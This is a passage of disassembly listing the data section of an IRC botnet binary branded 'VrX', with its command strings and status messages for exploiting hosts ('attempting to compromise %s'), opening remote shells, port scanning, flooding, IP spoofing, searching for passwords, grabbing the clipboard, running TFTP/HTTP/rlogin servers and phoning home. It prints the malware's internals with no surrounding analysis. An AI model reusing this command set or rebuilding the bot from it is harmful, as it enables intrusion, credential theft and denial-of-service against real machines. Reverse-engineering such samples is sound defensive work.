aKi db 'ki',0 ; DATA XREF: sub_401ACD+3F2C�o
align 4
; char aKill[]
aKill db 'kill',0 ; DATA XREF: sub_401ACD+3F15�o
align 4
; char aKp[]
aKp db 'kp',0 ; DATA XREF: sub_401ACD+3EFE�o
align 4
; char aKillproc[]
aKillproc db 'killproc',0 ; DATA XREF: sub_401ACD+3EE7�o
align 4
; char aDn[]
aDn db 'dn',0 ; DATA XREF: sub_401ACD+3ED0�o
align 4
; char aDns[]
aDns db 'dns',0 ; DATA XREF: sub_401ACD+3EB9�o
; char aSe[]
aSe db 'se',0 ; DATA XREF: sub_401ACD+3EA2�o
align 10h
; char aO[]
aO: ; DATA XREF: sub_401ACD+3E74�o
; .data:00438AEC�o
unicode 0, <o>,0
; char aOpen[]
aOpen db 'open',0 ; DATA XREF: sub_401ACD+3E5D�o
; sub_401ACD+583A�o ...
align 4
; char aPr[]
aPr db 'pr',0 ; DATA XREF: sub_401ACD+3E46�o
align 10h
; char aPrefix[]
aPrefix db 'prefix',0 ; DATA XREF: sub_401ACD+3E2F�o
align 4
; char aC_rn[]
aC_rn db 'c_rn',0 ; DATA XREF: sub_401ACD+3E18�o
align 10h
; char aC_rndnick[]
aC_rndnick db 'c_rndnick',0 ; DATA XREF: sub_401ACD+3E01�o
align 4
; char aC_q[]
aC_q db 'c_q',0 ; DATA XREF: sub_401ACD+3DEA�o
; char aC_quit[]
aC_quit db 'c_quit',0 ; DATA XREF: sub_401ACD+3DD3�o
align 4
; char aKillthread[]
aKillthread db 'killthread',0 ; DATA XREF: sub_401ACD+3DA5�o
align 4
; char aRaw[]
aRaw db 'raw',0 ; DATA XREF: sub_401ACD+3D77�o
; char aPt[]
aPt db 'pt',0 ; DATA XREF: sub_401ACD+3D60�o
align 4
; char aJ[]
aJ: ; DATA XREF: sub_401ACD+3D32�o
; .data:004387A4�o ...
unicode 0, <j>,0
; char aN[]
aN: ; DATA XREF: sub_401ACD+3D04�o
; .data:004387C4�o ...
unicode 0, <n>,0
unk_42B784 db 2Dh ; - ; DATA XREF: sub_401ACD+3CCF�o
db 3, 34h, 2
db 69h ; i
db 72h, 63h, 66h
db 75h ; u
db 63h, 6Bh, 2
db 3
aDisconnectingC db '- disconnecting clones...',0
align 4
; char aNickservRegist[]
aNickservRegist db 'nickserv register %s %s',0 ; DATA XREF: sub_401ACD+3C66�o
; char aRegister[]
aRegister db 'register',0 ; DATA XREF: sub_401ACD+3C3D�o
align 10h
; char aPrivmsgSS_0[]
aPrivmsgSS_0 db 'PRIVMSG %s :%s',0 ; DATA XREF: sub_401ACD+3BE2�o
align 10h
; char aMix[]
aMix db 'mix',0 ; DATA XREF: sub_401ACD+3B0D�o
; char aPrivmsgS_3[]
aPrivmsgS_3 db 'PRIVMSG %s :' ; DATA XREF: sub_401ACD+3AB7�o
; sub_401ACD+3AF2�o
dd 6E696601h, 1726567h, 0
; char aPrivmsgS_2[]
aPrivmsgS_2 db 'PRIVMSG %s :' ; DATA XREF: sub_401ACD+3A7C�o
dd 72657601h, 6E6F6973h, 1
; char aPrivmsgS_1[]
aPrivmsgS_1 db 'PRIVMSG %s :' ; DATA XREF: sub_401ACD+3A41�o
; sub_401ACD+3B62�o
dd 6E697001h, 167h
; char aCtcp[]
aCtcp db 'ctcp',0 ; DATA XREF: sub_401ACD+39EC�o
align 10h
; char aNoticeSS_1[]
aNoticeSS_1 db 'NOTICE %s :%s',0 ; DATA XREF: sub_401ACD+3951�o
; sub_401ACD+3991�o ...
align 10h
; char aNotice_0[]
aNotice_0 db 'notice',0 ; DATA XREF: sub_401ACD+38F7�o
align 4
; char aMsg[]
aMsg db 'msg',0 ; DATA XREF: sub_401ACD+3802�o
; char aChgnick[]
aChgnick db 'chgnick',0 ; DATA XREF: sub_401ACD+37BD�o
; char aNick_0[]
aNick_0 db 'nick',0 ; DATA XREF: sub_401ACD+36B5�o
; sub_401ACD+3CED�o
align 4
; char aPrivmsgS_0[]
aPrivmsgS_0 db 'PRIVMSG %s :' ; DATA XREF: sub_401ACD+369A�o
dd 43434401h, 4E455320h, 64252044h, 2064252Eh, 25206425h
dd 64252064h, 1
; char aDcc[]
aDcc db 'dcc',0 ; DATA XREF: sub_401ACD+361D�o
; char aJoinPart[]
aJoinPart db 'join/part',0 ; DATA XREF: sub_401ACD+34C6�o
align 4
; char aNickS_0[]
aNickS_0 db 'NICK %s',0 ; DATA XREF: sub_401ACD+34AB�o
; sub_401ACD+3712�o ...
; char aSI[]
aSI db '%s%i',0 ; DATA XREF: sub_401ACD+3490�o
; sub_40AAAC+4F�o ...
align 4
; char aPnick[]
aPnick db 'pnick',0 ; DATA XREF: sub_401ACD+344F�o
align 4
; char aPartSS[]
aPartSS db 'part %s %s',0 ; DATA XREF: sub_401ACD+3434�o
; sub_401ACD+3520�o ...
align 4
; char aPartflood[]
aPartflood db 'partflood',0 ; DATA XREF: sub_401ACD+340D�o
align 4
; char aPartS[]
aPartS db 'part %s',0 ; DATA XREF: sub_401ACD+33F2�o
; char aPart_0[]
aPart_0 db 'part',0 ; DATA XREF: sub_401ACD+33D0�o
; sub_401ACD+3D49�o
align 4
; char aJoinS[]
aJoinS db 'join %s',0 ; DATA XREF: sub_401ACD+33B5�o
; sub_401ACD+34F4�o ...
; char aJoin[]
aJoin db 'join',0 ; DATA XREF: sub_401ACD+3393�o
; sub_401ACD+3D1B�o
align 4
; char aModeSS[]
aModeSS db 'mode %s %s',0 ; DATA XREF: sub_401ACD+3378�o
align 10h
; char aMode[]
aMode db 'mode',0 ; DATA XREF: sub_401ACD+3329�o
; sub_401ACD+47C9�o
align 4
; char aNoticeSS_0[]
aNoticeSS_0 db 'notice %s :%s',0 ; DATA XREF: sub_401ACD+330E�o
align 4
; char aNt[]
aNt db 'nt',0 ; DATA XREF: sub_401ACD+32BF�o
align 4
; char aPrivmsgS[]
aPrivmsgS db 'privmsg %s :' ; DATA XREF: sub_401ACD+32A4�o
dd 1732501h, 0
; char aCt[]
aCt db 'ct',0 ; DATA XREF: sub_401ACD+3255�o
align 4
; char aPrivmsgSS[]
aPrivmsgSS db 'privmsg %s :%s',0 ; DATA XREF: sub_401ACD+323A�o
; sub_401ACD+385C�o ...
align 4
; char a_[]
a_: ; DATA XREF: sub_401ACD+320B�o
; sub_401ACD+3275�o ...
unicode 0, <_>,0
; char aPm[]
aPm db 'pm',0 ; DATA XREF: sub_401ACD+31EB�o
; sub_401ACD+4756�o
align 4
; char asc_42B93C[]
asc_42B93C db '-' ; DATA XREF: sub_401ACD+31BB�o
db 3, 34h, 2
db 56h ; V
db 72h, 58h, 20h
db 46h ; F
db 6Ch, 2 dup(6Fh)
db 64h ; d
db 2, 3, 2Dh
aSClonesLoadedT db ' %s clones loaded to %s:%s',0
align 4
; char aLoad[]
aLoad db 'load',0 ; DATA XREF: sub_401ACD+3164�o
align 10h
; char aFlood[]
aFlood db 'flood',0 ; DATA XREF: sub_401ACD+3143�o
align 4
; char aRinms[]
aRinms db 'rinms',0 ; DATA XREF: sub_401ACD+312C�o
align 10h
; char aReconnect_in_m[]
aReconnect_in_m db 'reconnect.in.ms',0 ; DATA XREF: sub_401ACD+3115�o
; char aRin[]
aRin db 'rin',0 ; DATA XREF: sub_401ACD+30FE�o
; char aReconnect_in[]
aReconnect_in db 'reconnect.in',0 ; DATA XREF: sub_401ACD+30E7�o
align 4
unk_42B9A4 db 2Dh ; - ; DATA XREF: sub_401ACD+30DA�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFailedToStartE db '- Failed to start exploiter thread, error: <%d>.',0
align 4
; char asc_42B9E4[]
asc_42B9E4 db '-' ; DATA XREF: sub_401ACD+3068�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aAttemptingToCo db '- attempting to compromise %s...',0
align 4
; char aExploit[]
aExploit db 'exploit',0 ; DATA XREF: sub_401ACD+2FE1�o
; char asc_42BA1C[]
asc_42BA1C db '-' ; DATA XREF: sub_401ACD+2FC5�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofIpSetToS_ db ' Spoof IP set to ',27h,'%s',27h,'.',0
align 4
unk_42BA48 db 2Dh ; - ; DATA XREF: sub_401ACD+2FA7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSIsAnInvalidIp db ' ',27h,'%s',27h,' is an invalid IP address.',0
; char aD_D_D_[]
aD_D_D_ db '%d.%d.%d.*',0 ; DATA XREF: sub_401ACD+2F83�o
align 4
unk_42BA88 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4049F7�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingCurren db ' Spoofing currently set to ',27h,'%s',27h,'.',0
align 10h
; char aGet_1[]
aGet_1 db 'get',0 ; DATA XREF: sub_401ACD:loc_4049D9�o
; sub_401ACD+3F71�o
unk_42BAC4 db 3 ; DATA XREF: sub_401ACD+2E9A�o
a81VrxInvalidLo db '8,1-VrX- Invalid login slot number: %d.',0
align 10h
unk_42BAF0 db 3 ; DATA XREF: sub_401ACD+2E8F�o
a81VrxNoUserLog db '8,1-VrX- No user logged in at slot: %d.',0
align 4
dword_42BB1C dd 312C3803h, 5872562Dh, 7325202Dh, 0 ; DATA XREF: sub_401ACD+2E3A�o
unk_42BB2C db 3 ; DATA XREF: sub_401ACD:loc_4048F8�o
a81VrxPoweredBy db '8,1-VrX- Powered By VIrUs & zerX! zerX.Virus Rules! (VIrUs@Power-'
db 'Hackers.com).',0
dword_42BB7C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401ACD+2E08�o
aFailedToSta_16 db '- Failed to start secure thread, error: <%d>.',0
align 4
; char asc_42BBB8[]
asc_42BBB8 db '-' ; DATA XREF: sub_401ACD+2D8E�o
db 3, 34h, 2
dd 75636573h, 3026572h, 7325202Dh, 73797320h, 2E6D6574h
dd 0
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401ACD+2D88�o
align 10h
aSecuring db 'Securing',0 ; DATA XREF: sub_401ACD+2D81�o
align 4
unk_42BBEC db 2Dh ; - ; DATA XREF: sub_401ACD+2D0A�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToSta_17 db ' Failed to start server thread, error: <%d>.',0
align 4
; char asc_42BC2C[]
asc_42BC2C db '-' ; DATA XREF: sub_401ACD+2C86�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
dword_42BC58 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401ACD+2C04�o
aFailedToSta_18 db '- Failed to start server thread, error: <%d>.',0
align 4
; char asc_42BC94[]
asc_42BC94 db '-' ; DATA XREF: sub_401ACD+2B95�o
; sub_411BCE+A8�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_42BCBC dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD+2AE2�o
aFindFile db 'Find file',0 ; DATA XREF: sub_401ACD+2ADD�o
align 4
dword_42BCD8 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401ACD+2ACA�o
aProcessList db 'Process list',0 ; DATA XREF: sub_401ACD+2AC5�o
align 4
unk_42BCF8 db 3 ; DATA XREF: sub_401ACD+2A52�o
a81VrxReconne_1 db '8,1-VrX- Reconnecting.',0
; char aQuitReconnecti[]
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_404512�o
; sub_401ACD:loc_409570�o ...
align 4
unk_42BD28 db 3 ; DATA XREF: sub_401ACD+2A30�o
a81VrxDisconnec db '8,1-VrX- Disconnecting.',0
align 4
; char aQuitDisconnect[]
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_4044F0�o
align 4
; char aQuitLater[]
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_401ACD:loc_4044DA�o
; sub_401ACD+78C1�o
align 4
; char aQuitS[]
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+29FB�o
align 4
unk_42BD78 db 3 ; DATA XREF: sub_401ACD+29D4�o
a81VrxStatusRea db '8,1-VrX- Status: Ready. Bot Uptime: %s.',0
align 4
; char unk_42BDA4
unk_42BDA4 db 3 ; DATA XREF: sub_401ACD+2995�o
a81VrxBotIdS_ db '8,1-VrX- Bot ID: %s.',0
align 4
unk_42BDBC db 2Dh ; - ; DATA XREF: sub_401ACD+2986�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToSta_19 db '- Failed to start list thread, error: <%d>.',0
align 4
; char asc_42BDF8[]
asc_42BDF8 db '-' ; DATA XREF: sub_401ACD+2917�o
db 3, 34h, 2
dd 65726874h, 2736461h, 4C202D03h, 20747369h, 65726874h
dd 2E736461h, 0
; char aSub[]
aSub db 'sub',0 ; DATA XREF: sub_401ACD+28F1�o
unk_42BE1C db 3 ; DATA XREF: sub_401ACD+289F�o
a81VrxAliasList db '8,1-VrX- Alias list.',0
align 4
unk_42BE34 db 2Dh ; - ; DATA XREF: sub_401ACD+2884�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedToSta_20 db '- Failed to start listing thread, error: <%d>.',0
; char asc_42BE6C[]
asc_42BE6C db '-' ; DATA XREF: sub_401ACD+2815�o
db 3, 34h, 2
dd 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh, 2E676Fh
unk_42BE84 db 3 ; DATA XREF: sub_401ACD+276D�o
a81VrxNetworkIn db '8,1-VrX- Network Info.',0
unk_42BE9C db 3 ; DATA XREF: sub_401ACD+273E�o
a81VrxSystemInf db '8,1-VrX- System Info.',0
align 4
unk_42BEB4 db 3 ; DATA XREF: sub_401ACD+26E9�o
a81VrxRemovingB db '8,1-VrX- Removing Bot.',0
; char asc_42BECC[]
asc_42BECC db '-' ; DATA XREF: sub_401ACD+26CD�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToSta_21 db ' Failed to start listing thread, error: <%d>.',0
align 4
; char asc_42BF08[]
asc_42BF08 db '-' ; DATA XREF: sub_401ACD+2658�o
db 3, 34h, 2
dd 636F7270h, 2D030273h, 6F725020h, 73656363h, 696C2073h
dd 2E7473h
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_401ACD+2638�o
align 4
unk_42BF2C db 2Dh ; - ; DATA XREF: sub_401ACD+25D9�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_2 db ' Already running.',0
align 4
; char unk_42BF4C
unk_42BF4C db 3 ; DATA XREF: sub_401ACD+2588�o
a81VrxUptimeS_ db '8,1-VrX- Uptime: %s.',0
align 4
; char asc_42BF64[]
asc_42BF64 db '-' ; DATA XREF: sub_401ACD:loc_403F8A�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
unk_42BF84 db 2Dh ; - ; DATA XREF: sub_401ACD+24B6�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 4
unk_42BFAC db 2Dh ; - ; DATA XREF: sub_401ACD+249A�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 4
unk_42BFD8 db 3 ; DATA XREF: sub_401ACD+2484�o
a81VrxGetClipbo db '8,1-VrX- Get Clipboard.',0
align 4
dword_42BFF4 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_401ACD+2456�o
dd 2Dh
unk_42C00C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403F13�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
unk_42C038 db 2Dh ; - ; DATA XREF: sub_401ACD+243F�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 4
; char asc_42C05C[]
asc_42C05C db '-' ; DATA XREF: sub_401ACD:loc_403EE8�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
unk_42C088 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403EE1�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 4
unk_42C0B4 db 2Dh ; - ; DATA XREF: sub_401ACD+240D�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
unk_42C0D8 db 2Dh ; - ; DATA XREF: sub_401ACD+23BA�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_22 db '- Failed to start server thread, error: <%d>.',0
align 4
; char asc_42C114[]
asc_42C114 db '-' ; DATA XREF: sub_401ACD+234B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
; char asc_42C150[]
asc_42C150 db '-' ; DATA XREF: sub_401ACD+2265�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_23 db ' Failed to start server thread, error: <%d>.',0
align 4
; char asc_42C18C[]
asc_42C18C db '-' ; DATA XREF: sub_401ACD+21FA�o
; sub_40BD91+449�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_42C1C8 db 2Dh ; - ; DATA XREF: sub_401ACD+20F3�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_24 db ' Failed to start server thread, error: <%d>.',0
align 4
; char asc_42C204[]
asc_42C204 db '-' ; DATA XREF: sub_401ACD+2084�o
; sub_40BD91+DA�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 4
unk_42C238 db 2Dh ; - ; DATA XREF: sub_401ACD+1FCF�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_3 db ' Already running.',0
align 4
unk_42C258 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_403A86�o
db 3, 34h, 2
db 4Dh ; M
db 61h, 2 dup(53h)
db 20h
db 53h, 63h, 41h
db 6Eh ; n
db 2, 3, 2Dh
aFailedToSta_25 db ' Failed to start scan, port is invalid.',0
; char asc_42C290[]
asc_42C290 db '-' ; DATA XREF: sub_401ACD+1F6C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_26 db '- Failed to start scan thread, error: <%d>.',0
align 4
; char asc_42C2CC[]
asc_42C2CC db '-' ; DATA XREF: sub_401ACD+1EFB�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanStart db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_401ACD+1ED0�o
; sub_401ACD+5B20�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_401ACD+1EC9�o
; sub_401ACD+5B19�o
align 4
; char asc_42C34C[]
asc_42C34C db '-' ; DATA XREF: sub_401ACD+1D0F�o
db 3, 34h, 2
dd 3025A56h
aAlreadyDScanni db '- Already %d scanning threads. Too many specified.',0
align 4
unk_42C388 db 2Dh ; - ; DATA XREF: sub_401ACD+1CB2�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_27 db 'Failed to start search thread, error: <%d>.',0
; char asc_42C3C4[]
asc_42C3C4 db '-' ; DATA XREF: sub_401ACD+1C38�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
; char aFp[]
aFp db 'fp',0 ; DATA XREF: sub_401ACD+1BEF�o
align 10h
; char aFindpass[]
aFindpass db 'findpass',0 ; DATA XREF: sub_401ACD+1BDE�o
align 4
; char aNoticeSPhoning[]
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: DADI Are You There?! ;).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+1BC8�o
; char aPhonehome[]
aPhonehome db 'phonehome',0 ; DATA XREF: sub_401ACD+1BB1�o
align 4
; char aAs[]
aAs db 'as',0 ; DATA XREF: sub_401ACD+1B9C�o
align 10h
; char aAsc[]
aAsc db 'asc',0 ; DATA XREF: sub_401ACD+1B87�o
; char unk_42C444
unk_42C444 db 3 ; DATA XREF: sub_401ACD+1B37�o
a81VrxCrashingB db '8,1-VrX- Crashing bot.',0
; char aShitycrash[]
aShitycrash db 'shitycrash',0 ; DATA XREF: sub_401ACD+1B21�o
; sub_401ACD+1B71�o
align 4
; char aTftp[]
aTftp db 'tftp',0 ; DATA XREF: sub_401ACD+1B0C�o
align 10h
; char aTftpserver[]
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_401ACD+1AF7�o
align 4
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_401ACD+1AE2�o
align 4
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_401ACD+1ACD�o
align 10h
; char aRlogin[]
aRlogin db 'rlogin',0 ; DATA XREF: sub_401ACD+1AB8�o
align 4
; char aRloginserver[]
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_401ACD+1AA3�o
align 4
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_401ACD+1A8E�o
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_401ACD+1A79�o
align 4
; char aFdns[]
aFdns db 'fdns',0 ; DATA XREF: sub_401ACD+1A64�o
align 10h
; char aFlushdns[]
aFlushdns db 'flushdns',0 ; DATA XREF: sub_401ACD+1A4F�o
align 4
; char aFarp[]
aFarp db 'farp',0 ; DATA XREF: sub_401ACD+1A3A�o
align 4
; char aFlusharp[]
aFlusharp db 'flusharp',0 ; DATA XREF: sub_401ACD+1A25�o
align 10h
; char aGc[]
aGc db 'gc',0 ; DATA XREF: sub_401ACD+1A10�o
align 4
; char aGetclip[]
aGetclip db 'getclip',0 ; DATA XREF: sub_401ACD+19FB�o
; char asc_42C4EC[]
asc_42C4EC db '-' ; DATA XREF: sub_401ACD+19BD�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
; char Str2[]
Str2 db 'off',0 ; DATA XREF: sub_401ACD+19A2�o
; sub_401ACD+3C81�o ...
; char aSpoof[]
aSpoof db 'spoof',0 ; DATA XREF: sub_401ACD+198E�o
align 10h
unk_42C520 db 3 ; DATA XREF: sub_401ACD+196E�o
a81VrxLoginList db '8,1-VrX- Login list complete.',0
align 10h
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_401ACD+1939�o
; sub_40B477+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_401ACD:loc_4033F9�o
dword_42C550 dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_401ACD+1902�o
; char aWho[]
aWho db 'who',0 ; DATA XREF: sub_401ACD+18E5�o
dword_42C568 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_401ACD+18DA�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_401ACD+18D5�o
align 4
; char aCmdstop[]
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_401ACD+18BC�o
; char aOcmd[]
aOcmd db 'ocmd',0 ; DATA XREF: sub_401ACD+18A7�o
align 4
; char aOpencmd[]
aOpencmd db 'opencmd',0 ; DATA XREF: sub_401ACD+1892�o
; char aDll[]
aDll db 'dll',0 ; DATA XREF: sub_401ACD+187D�o
; char aTestdlls[]
aTestdlls db 'testdlls',0 ; DATA XREF: sub_401ACD+1868�o
align 4
; char aDrv[]
aDrv db 'drv',0 ; DATA XREF: sub_401ACD+1853�o
; char aDriveinfo[]
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_401ACD+183E�o
align 4
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_401ACD+1829�o
align 10h
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_401ACD+1814�o
align 4
; char aPs[]
aPs db 'ps',0 ; DATA XREF: sub_401ACD+17FF�o
align 4
; char aProcs[]
aProcs db 'procs',0 ; DATA XREF: sub_401ACD+17EA�o
align 4
; char aKosomaky4d[]
aKosomaky4d db 'KOSOMAKY4D',0 ; DATA XREF: sub_401ACD+17C0�o
; sub_401ACD+17D5�o
align 10h
; char aSi[]
aSi db 'si',0 ; DATA XREF: sub_401ACD+17AB�o
align 4
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_401ACD+1796�o
; char aNi[]
aNi db 'ni',0 ; DATA XREF: sub_401ACD+1781�o
align 10h
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_401ACD+176C�o
; char aClg[]
aClg db 'clg',0 ; DATA XREF: sub_401ACD+1757�o
; char aClearlog[]
aClearlog db 'clearlog',0 ; DATA XREF: sub_401ACD+1742�o
align 4
; char aLg[]
aLg db 'lg',0 ; DATA XREF: sub_401ACD+172D�o
align 4
; char aLog[]
aLog db 'log',0 ; DATA XREF: sub_401ACD+1718�o
; char aAl[]
aAl db 'al',0 ; DATA XREF: sub_401ACD+1703�o
align 4
; char aAliases[]
aAliases db 'aliases',0 ; DATA XREF: sub_401ACD+16EE�o
; char aT[]
aT: ; DATA XREF: sub_401ACD+16D9�o
; .data:00438778�o ...
unicode 0, <t>,0
; char aThreads[]
aThreads db 'threads',0 ; DATA XREF: sub_401ACD+16C4�o
unk_42C628 db 3 ; DATA XREF: sub_401ACD+1690�o
a81VrxFailedToR db '8,1-VrX- Failed to reboot system.',0
align 4
; char unk_42C64C
unk_42C64C db 3 ; DATA XREF: sub_401ACD+1689�o
a81VrxRebooting db '8,1-VrX- Rebooting system.',0
; char aR3start[]
aR3start db 'r3start',0 ; DATA XREF: sub_401ACD+1672�o
; char aI[]
aI: ; DATA XREF: sub_401ACD+165D�o
; .data:00438784�o ...
unicode 0, <i>,0
; char aId[]
aId db 'id',0 ; DATA XREF: sub_401ACD+1648�o
align 4
; char aS_5[]
aS_5: ; DATA XREF: sub_401ACD+1633�o
; .data:00438790�o ...
unicode 0, <s>,0
; char aStatus[]
aStatus db 'status',0 ; DATA XREF: sub_401ACD+161E�o
align 4
; char aQ[]
aQ: ; DATA XREF: sub_401ACD+1609�o
; .data:off_438768�o ...
unicode 0, <q>,0
; char aQuit_0[]
aQuit_0 db 'quit',0 ; DATA XREF: sub_401ACD+15F4�o
align 10h
; char aDc[]
aDc db 'dc',0 ; DATA XREF: sub_401ACD+15DF�o
align 4
; char aDisconnect[]
aDisconnect db 'disconnect',0 ; DATA XREF: sub_401ACD+15CA�o
align 10h
; char aR[]
aR: ; DATA XREF: sub_401ACD+15B5�o
; sub_401ACD+3D8E�o ...
unicode 0, <r>,0
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_401ACD+15A0�o
align 10h
; char aExplist[]
aExplist db 'explist',0 ; DATA XREF: sub_401ACD+158B�o
; char aExploitlist[]
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_401ACD+1576�o
; char aCbstats[]
aCbstats db 'cbstats',0 ; DATA XREF: sub_401ACD+1561�o
; char aConnectbacksta[]
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_401ACD+154C�o
align 10h
